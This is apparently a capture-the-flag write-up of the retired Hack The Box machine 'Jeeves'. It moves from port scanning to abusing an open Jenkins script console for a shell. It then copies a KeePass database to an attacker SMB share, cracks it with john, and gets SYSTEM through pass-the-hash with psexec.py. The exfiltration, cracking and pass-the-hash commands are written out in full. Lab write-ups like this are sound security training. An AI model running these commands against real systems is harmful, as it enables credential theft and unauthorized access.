Jeeves machine is a vulnerable machine with Windows operating system among retired machines. It is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Full Port Scan
As a result of the port scan, 80/tcp http Microsoft IIS httpd 10.0, 135/tcp msrpc Microsoft Windows RPC, 445/tcp microsoft-ds Microsoft Windows 7 – 10 microsoft-ds (workgroup: WORKGROUP), 50000/tcp http Jetty 9.4.z-SNAPSHOT ports are open.
We provide enumeration on port 80.
We looked at the source code in developer mode and with wepanalzyer and we could not get any results.
No matter what we type in the search section, the server keeps giving error 🙂
We did not get any valuable information here, so let’s see if there are hidden files and directories with gobuster
A file directory search did not reveal any valuable information. Let’s go here
Let’s see if http works on port 50000.
Here we have Jetty. (Eclipse Jetty is a Java web server and Java Servlet container. While web servers are usually associated with serving documents to people, Jetty is now often used for machine-to-machine communication within larger software frameworks. )
Here we are doing a file directory scan.
We have detected the /askjeeves directory.
Let’s go here
Here we have logged in to jenkins immediately
Since Jenkins is an automation server on the interface we are providing Enumeration on, it is certain that we will have some kind of direct access to the underlying machine. Going to Manage Jenkins under the top left menu, a scripting console appears.
We came across Groovy script and I had no idea about this language.
The part that interests me is that it offers a shell screen that I can access to the machine.
Looking at the first github page
And I use this code and run it
we got shell in user jeeves\kohsuke
We provide local enumeration to get the administrator authorization.
I go to the Documents directory
I came across the .kdbx file where I understand it is keepas database
If I can detect passwords in this database, I can get root flage.
Let’s forward this database to our own machine.
Here we first start smb server on our attacker machine.
python3 /usr/share/doc/python3-impacket/examples/smbserver.py ma .
then copy the CEH.kdbx file from the target machine to the share
copy C:\Users\kohsuke\Documents\CEH.kdbx \10.10.14.19\ma\CEH.kdbx
Then the database comes to our attacker machine
Here we convert the kdbx file to hash value with keepass2john tool
And we’re trying to break it with john
└─# keepass2john CEH.kdbx > hash_db
└─# john –wordlist=/usr/share/wordlists/rockyou.txt hash_db
Here we successfully cracked the master key as “moonshine1”.
We ran the keepassx tool
This is how we accessed the keys
hash (we tried other passwords without successful login)
here we try the passthehash attache using the psexec.py tool
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238ff238cbe81fe00 email@example.com cmd.exe
We obtained shell from user nt authority\system
We noticed that there is no flag in the Desktop folder, let’s look at Alternate Data Streams to make sure there is a flag here.
This is how we got the root flag.